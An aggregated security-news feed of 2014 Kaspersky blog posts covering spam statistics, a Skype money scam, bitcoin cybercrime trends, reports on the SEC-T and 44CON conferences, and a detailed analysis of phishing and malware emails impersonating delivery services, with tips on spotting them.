In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and had 12.61% of all Anti-Phishing component detections. Second was Facebook, which is traditionally the most popular phishing target. Its contribution increased by 0.4 pp. It is followed by Yahoo! (6.38%). For recap, in July third position was occupied by Windows Live.

In August spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo services! The emails read that Yahoo! administration had registered attempts to enter the user's account from an unidentified device. This activity caused suspicion and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of the personal data: the first one - to confirm the password and prevent blockage and the second one - to protect the account in case the entry had been performed ​​by anyone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged and the design of the emails used the Yahoo! logo.

The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.

If you look at the HTML code of the phishing pages, it becomes clear that in the first case the victim's data was sent to the PHP page of the fraudsters while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address which would be entered in the 'From' field as well as the subject of the email. This enabled the fraudsters to identify the information about usernames and passwords received from the users within each mass mailing.

Conclusion

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July – the USA (15,9%), Russia (6%) and China (4.7%).

In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to lure money from the victims.

Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.

To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.

In August, spammers actively promoted the services of travel and debt collection agencies.

August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of the Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.

Russian-speaking fraud on Skype

Malware Alerts - Thu, 09/25/2014 - 03:42

It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.
Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:

Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles – or even better 200 – to the number  +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I pay you back as soon as I get home!!

What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.

The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.

Well, that escalated quickly

Malware Alerts - Thu, 09/25/2014 - 03:00

An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in the sleepless Seattle. Discussing the situation from an economic standpoint I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts, and by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomena that changes so rapidly and present it to a group of security experts who are already well-informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.

While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.

More users, more attacks: Kaspersky Lab stats show a surge in Bitcoin cybercrime

As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year.  Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.

As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."

It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.

We have only recently seen why countries like Argentina and Brazil have become a fertile ground for the adoption of a cryptocurrency economy, and as we realize this, so have too cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure in no easy task in today's hyper connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general audience is still widely vulnerable to many attacks seen in other parts of the world.

After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.

Analysis of, Malware from the Mt. Gox Leak Archive

Being your own bank is more difficult than it seems

Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.

Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.

Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.

Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.

Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.

September's 3x CON: Part 2

Malware Alerts - Wed, 09/24/2014 - 12:00

What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.

The Schedule
This conference features only one track of presentations, which – in my opinion – is quite a good thing, because you don't have to make any difficult choices This year, besides the regular full-time presentations, the agenda included a couple of 30-minute long "small talks" as well as a bunch of lightning talks of 10-20 minutes each.

SEC-T badge

The Talks
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!

The keynote

Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.

Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.

The Crew

In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!

Connect for good health

SANS Tip-of-the-Day - Tue, 09/23/2014 - 23:37

September's 3x CON: Part 1

Malware Alerts - Tue, 09/23/2014 - 10:11

What, Where & When: the 4th edition of 44CON, an annual IT Security Conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition center. Geeks, who happened to enjoy somewhat spooky historical monuments, could take a five minute walk from the venue to visit an old and impressive cemetery, one of the London's Magnificent Seven.

The Schedule this year was packed with three tracks of (mostly) 1h long presentations within a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT related threats, to GSM hacking. Some amazing workshops were running simultaneously in rooms that were bearing the familiar names of AES, 2DES and Blowfish.

44CON Badge: BusBlaster v3

 

This year's Badge is not only extremely handsome, but also may turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board, especially customized for 44CON (you can find the full specification here). This small cute thingy can be used to program and debug embedded ARM devices.

The Talks
With so many things going on simultaneously, it was impossible to fully attend even a third of them. Moreover, the online schedule didn't include the description of the talks, so in some cases choosing the right track in advance was kind of a lottery. Nevertheless, the overall quality of presentations was so high, that no matter which talks you chose, you always ended up with some new, valuable information.

Joshua J. Drake on the stage

From the selection of very good talks I attended, here are my favourite ones:

  • "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
  • "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats for small network devices, such as residential gateways (aka SOHO routers), from which a fair share is using the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me), that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with hardware vendors, who don't seem concerned enough about security issues...
  • "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This quite an intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of the GRX protocol, it's functionality and weaknesses, and which kind of information can be leaked; in the second part the speakers presented the results of "extensive network scanning" that they conducted during the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.

Socializing at 44CON

The Networking has been made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days), which was especially dedicated for human interaction and socialization in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to provide British ale, cider and Pimm's; every attendee was also offered a free glass of gin & tonic.

Some of The Materials have already been published and they are available at Slideshare.

Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!

Scammers' delivery service: exclusively dangerous

Malware Alerts - Wed, 09/17/2014 - 07:00

Well-known companies and brands are favorite targets for fraudsters. After all, it is much easier to get people's attention with the use of a popular name, so scammers have more chance of trapping a gullible user.

In this article, we will analyze phishing and malicious emails sent by fraudsters on behalf of international delivery services. The most popular of these are DHL (Germany), FedEx and United Parcel Service (USA), TNT (Netherlands). All of these companies are international, with millions of customers using branches in major countries all over the world. They provide similar services, so scammers use the same methods and techniques in their fraudulent mails.

The phishers' goals include:

  1. Theft of confidential data (bank card credentials, logins and passwords from personal accounts), mainly with the help of fake web pages imitating official pages of the site. In a phishing attack users provides the fraudsters with their personal data by filling the fields on fake sites or sending them via email.
  2. Installing various malicious programs on users' computers. These programs are used not only to monitor user online activity and steal personal information, but also to organize botnets to distribute spam and launch DDoS attacks.
Headings of fraudulent emails The From field

Structurally, the  address in the From field looks like this: Sender Name . To confuse recipients, scammers can change parts of the address and often make it look very similar to an official address of the delivery service.

There are several groups of email addresses seen in fraudulent emails:

  1. Email addresses which closely resemble companies' legitimate public addresses. Generally, they use the name of the company (DHL INC, TNT COURIER SERVICE, Fedex, etc.) as the sender name. The name of the mailbox often includes the words info, service, noreply, mail, support which are typical of email addresses used to send official notifications. The server domain name often has a real or very plausible company domain.
  2. Addresses which do not resemble legitimate company addresses. The sender name still reflects the company name (FedEx, DHL Service, FedEx.com) but the domain name usually belongs to a free email service or an absolutely different company. The email address could be taken from a real user (taken from public sources or hacked mailboxes) or automatically generated addresses. The latter usually appear as a random sequence of letters, words and numbers.
  3. Addresses that resemble e-mail addresses of company employees. The sender name may contain the name and surname of a supposed employee, or the company name, or a position (courier, manager, etc). The name of the email box usually contains the same name and surname as the sender name because any difference in the data may alert the recipient to a fraudulent email. Either the real company domain or other domains not related to delivery companies might be used as a domain name.
  4. Addresses which only indicate the sender's address without a name.

While analyzing sender address, remember that scammers do not need to hack the company servers to use the real company domain in the From field. They can simply insert the necessary domain name of the server into the From field.

The Subject field

The subject of the fraudulent mail should capture the imagination of recipients and encourage them to open the message, but it also needs to be plausible. Therefore spammers choose common phrases typical of official notifications from delivery services. After sending a parcel or a document, customers worry about its successful delivery and try to follow its progress by reading any notification from a delivery service.

The most popular subjects are:

  1.  Subjects related to the delivery/shipment (shipment notifications, delivery status, shipping confirmation, shipment documents, delivery information, etc.).
  2. Examples:

  3. Subjects related to tracking shipments, order information and invoices (the tracking number of the shipment, tracking the shipment, etc.).
  4. Examples:

  5. Subjects related to notifications about messages and accounts (creation and confirmation of accounts, new messages, etc.).
The design of the email

Scammers pay special attention to the design of the email. Their main goal is to make message as believable as possible. After all, if it looks suspicious, a potential victim will most likely delete it despite the attractive subject and plausible sender address. Let's analyze the basic techniques that fraudsters use to make emails look legitimate.

Graphic design

All major international companies have their own corporate style, including wordmarks, graphic trademarks, corporate fonts, slogans and color schemes. These are used on the official website, in mailings and commercials, and in other design components. Scammers use at least some of these elements when designing fraudulent emails to make them look convincing. Usually phishers focus on logos because these elements are unique to each company and is an immediate identifying mark.

Examples of DHL company logos used in fraudulent emails.

Let's take a closer look at these examples. It's immediately obvious that the second example is very different from the company's official logo. Another sign of a forgery is the difference in size between the false logo and the original, as seen in the fourth example where the logo takes almost a third of the message. Here the plan is probably to attract the reader's attention with a large bright picture rather than plain text. That also explains why the phishing links appear in a larger font: users should respond to it immediately, without trying to read the small print.

In the first example, the scammers are trying to copy the design from the official site (a very popular method). However the logo is placed on the right-hand side rather than on the left. Also they are using a color blend for the logo background rather than making it single-color. The logo in the third example most closely imitates the original DHL logo: the scammers have tried to match its size and design. It's not really all that difficult to make a logo for a fake notification: there are plenty of versions of the original image available online in several formats, including vector graphics. In addition to the logo the fraudsters use the color spectrum chosen by the company in its official resources and mailings. For example, for DHL it is a combination of yellow and red.

The text design

In most official emails we find a number of set phrases, especially when it comes to standard notifications generated and sent automatically. These messages often include contacts and links to the official resources of the sender. Therefore, to make the text of the fake email look like an original notification from a delivery service the fraudsters use:

  1. Standard phrases typical of official mass mailings: Please do not reply to this email, This is automatically generated email, please do not reply, All rights reserved, Diese Versendung ist automatisch, Bitte beantworten Sie diese nicht, This communication contains proprietary information and may be confidential. Questo e' un email automatico, Si prega di non rispondere, etc.
  2. Links to the official page of the company. Not all links contained in the fraudulent email are phishing - spammers may also use the links which really lead to the official resources on order to make their emails look legitimate and bypass spam filtering.
  3. Contact for feedback. The fraudsters often indicate the contact information of the sender or the company (name, surname, position, office address). These contacts might be real or fictitious.
The content of the email

When fraudsters send out fake emails convincing readers that it is a real message is only part of the battle. The next step is to persuade the potential victim to do what the scammer requires, such as providing personal information or installing a malicious file. This is where psychology comes into play, and the email content is the main tool.

In fraudulent notifications allegedly sent on behalf of delivery services often use the following tricks:

  1. Notifications of various problems (eg. unsuccessful delivery, lack of information, wrong address, no recipient at the delivery address). These phrases are usually related to the delivery since the companies in question are in the service sector. Therefore, a logistics company warning of a problem with a delivery doesn't prompt any suspicion, especially if the email contains some details of the situation.
  2. A demand to do something or face some consequence. For example, "collect your parcel within 5 days otherwise it will be returned to the sender".
  3. The scammers use deadlines like this to make recipients react immediately. The phishers hope that users will be so worried about losing the parcel or paying extra costs that they won't hesitate to provide personal details or open a suspicious attachment.

  4. Phrases about the content of an attachment or link (invoices, detailed information, documents).
  5. Users are unlikely to open unknown attachments or follow unknown links. That's why scammers imitate official websites and present malware as a document with information a parcel. In addition, if the text of the notification states that the attachment contains, for example, a consignment document, the malicious archive will have a similar name, such as "consignment.zip." This applies to phishing links as well - scammers name their links with an appropriate phrase from the text, such as "shipping information".

    This simple trick is intended to reassure recipients that the attachment or link is perfectly legitimate.

  6. Phrases about the need to do something (follow a link, open an attachment, print out a file, etc.).
  7. Assuming the fraudsters have convinced the recipients that the email is real, the next step is to tell the victims how to solve their problems. Fulfilling these instructions is the ultimate goal of the fraudulent email. Here it is important for the scammers not just to tell recipients what they need to do, but to make them understand correctly what is written in the message. To avoid any misunderstanding on the part of the recipients, messages often contains detailed instructions about what to do.

How the text might change

Cheating the user is not the only thing scammers have to do. They also need to bypass spam filters and deliver the email to the email boxes of potential victims. One of the most popular and long-used methods to bypass filtering is to change text fragments within the email. Modern programs designed to send out spam messages include ample opportunities to generate multiple changes in the text. The text of a message which varies from email to email makes the email unique, while different personal information specified within one mailing (such as the number of the shipment, the form of the address, the dates) helps to convince recipients that the email is intended for them. In addition, the fraudsters can send out emails designed in the same style for several months - they only need to change some elements in the text.

Fraudulent notifications from delivery services can change:

  1. The information about the order/shipment, including the tracking number of the shipment, delivery dates, etc.)
  2. Contact details, sender names and company names. Some mass mailings provide an e-mail address or a phone number of a company representative for feedback. This particular data changes from email to email. In addition, names of company representatives and even company names themselves may also vary.
  3. The name of the attachment. It mainly refers to malicious attachments which names vary in messages within one mass mailing while these different names hide one and the same malicious program.
  4. Links. In phishing emails and emails with malicious attachments scammers often specifically change the addresses of the links, masking them with the help of different URL shorteners. Most of these links are quickly blocked by current antivirus programs.
  5. Phrases indicating numbers and dates. These can refer to timetables (days, hours), sums of money and dates (day and month)
  6. The greeting. Here spammers generally use the email address and/or the name of the recipient. Sometimes they use generic expressions (Dear client, Dear customer, etc.) instead.
  7. Other text fragments. Some words are replaced with other phrases that have a similar meaning so the general sense of the sentence remains unchanged.

Let's analyze some examples of changes in the text of fraudulent emails.

Below are some emails from yet another mass mailing.

Fake pages

To steal personal information from users, scammers create phishing HTML pages which partially or completely copy the official website of a company. If victims of fraud enters their personal information (bank details, usernames and passwords) on this page, that data immediately falls into the fraudsters' hands.

To mask the links leading to phishing websites the fraudsters often use popular free URL shorteners. In addition, most services offer customers the ability to view the statistics on the short link which tells fraudsters more about the number of clicks on any links etc. Phishing pages can be located on specially registered domains which usually have a short life span as well as on compromised domains whose owner may not even be aware that the web site is being used for fraudulent purposes.

Let's analyze a fake email sent on behalf of FedEx in which recipients are asked to update their account information. The text of the email contains a link to the official website of the company while the real address to which the user is redirected is nothing like the legitimate page and is located on a free URL shortener service. This becomes obvious when you hover on the link.

After clicking the link, users get to a fraudulent page imitating the official website of FedEx, where they are asked to enter their logins and passwords to access their accounts. Once the users fill in the fields and click "Login", the entered information is transmitted to the scammers who can then access the victims' personal accounts. The menu tabs and other links on the phishing page are often inactive, so clicking on them will not take users to the appropriate page. However, in some cases, phishers imitate all links on the page so that users do not have any doubt about its legitimacy. Sometimes the design of the page imitates the official site but does not copy it completely. If you have a closer look at the details, you will see some differences between the designs of the real and the fake pages. However, most users do not pay attention to small details and this carelessness helps the scammers to steal personal information.

Below is yet another example of an email sent on behalf of FedEx. This time it contains a malicious link.  The email informs recipients that delivery is impossible because of missing information. And now users have to follow the specified link for verification.

The link leads to a fraudulent page where potential victims are invited to download a program that will supposedly check whether they are really going to receive a parcel. Naturally, the program turns to be the well-known Zeus Trojan, which helps the fraudsters to access the computer and all the personal information on it.

Scammers might not only include a phishing link in the body of the email, but also attach an HTML phishing page designed to steal personal data. However this use of HTML attachments as phishing pages is unusual for fraudulent mailings sent on behalf of delivery services.

Fraudulent emails in different languages

To increase the audience of recipients and customers, spammers are mastering new languages. In addition to traditional English and German, current spam traffic includes emails in Hebrew, Albanian and other languages​​ which were found in advertising and fraudulent mailings a few years ago. For example, you may come across fake notifications from international delivery services written in Italian and Dutch. These emails do not have any special features that distinguish them from English- or German-language messages - to cheat users, the fraudsters resort to the same tricks.

For example, this Italian-language fake notification from FedEx tells users to confirm their identity by following a fraudulent link.

Yet another mass mailing in Italian contained a malicious archive which included the Zeus/Zbot Trojan used to steal personal data. The fraudulent email claimed that the user profiles on the website had been updated and there was more detailed information about it in the archive.

Another fake notification written in Dutch on behalf of TNT informs recipients that new accounts have been formed for them, with details in the attachment. The archive attached to the email contains Backdoor.Win32.Andromeda, a malicious file that allows the scammers to control the infected computer without the user knowing.

Malware in fraudulent emails

Spam is one of the most popular ways of spreading malware and infecting computers on the Internet. Attackers have various tricks to make victims install malicious software on their computers. Email traffic includes a variety of private emails, such as wedding invitations, dating offers and other similar messages. However, fake notifications from well-known companies and brands providing different services remain the most popular cybercriminal trick. International delivery services are also used by spammers as a cover for malicious spam.

Malware spread in fake notifications from delivery services is divided into:

  1. Trojan programs developed to perform unauthorized operations in order to delete, block, modify or copy data, to disrupt computer or network performance. Trojans distributed in spam include Backdoors, Trojan-Downloaders, Trojan-Proxies, Trojan-PSWs, Trojan-Spies, Trojan-Bankers and others
  2. Worms, malicious programs capable of unauthorized self-proliferation on computers or computer networks. Those copies go on to spread themselves further.

What is dangerous about malicious programs?

  1. They can steal usernames and passwords from users' accounts, as well as financial or other information sought by the attackers.
  2. They can create botnets for distributing spam, DDoS attacks and other criminal activity
  3. They can provide fraudsters with control over victim computers, including the ability to run, delete or install any files or programs.

Current malicious programs integrate broad-ranging fraudulent functionality. In addition, some malicious programs can download other malware, providing additional opportunities. These might include stealing usernames and passwords entered in the browser or seizing remote control over the whole computer.

Malicious objects in fraudulent notifications can be embedded directly in the email or downloaded from a link provided in the body of the message. The most dangerous thing about it is that malware can be run and installed without users being aware or installing any software themselves. Typically, malicious ZIP (less often RAR) files enclosed in fraudulent emails have an executable .exe extension.

How to recognize phishing emails

Below are a number of features that can help to identify a fraudulent email.

  1. The sender address. If the sender address includes a random sequence of letters, words or numbers, or the domain has no connection with the official address of the company, the emails should undoubtedly be considered fraudulent and deleted without opening.
  2. Grammar and spelling mistakes. Wrong word order, incorrect punctuation, grammar and spelling mistakes can also be a sign of a fraudulent mailing.
  3. Graphic design. Scammers are doing their best to make the email look very similar to the original. To this ends they are trying to imitate other companies' corporate styles using some of their elements such as color schemes and logos. Inaccuracies and noticeable design errors are among the signs of a fake email.
  4. The content of the email. If the recipient of the email is asked under various pretexts to urgently provide or confirm personal information, download a file or a link – especially while being threatened with sanctions for not doing so – the email may well be fraudulent.
  5. Links with different addresses. If the address of the link specified in the body of the email and address of the actual link to which you are redirected do not match, you are definitely looking at a fraudulent email. If you are viewing your email from the browser, the actual link can be usually seen in the bottom left of the browser window. If you use an email client, the actual link can be displayed in a popup window if you hover the cursor over the link in the text. Fraudulent links can also be attached to a text phrase in the email.
  6. Attached archives. Generally, ZIP and RAR archives are used by cybercriminals to hide malicious executable EXE-files. Therefore, you should not open these archives or run the attached files.
  7. Lack of contacts for feedback. Legitimate emails always provide contact information for feedback - either the company or the sender's personal contacts.
  8. Form of address. Fraudulent emails do not necessarily use the first name or the surname to address the recipient; sometimes a universal form of address ("client", etc.) is used.

Pages

Subscribe to RIT Information Security aggregator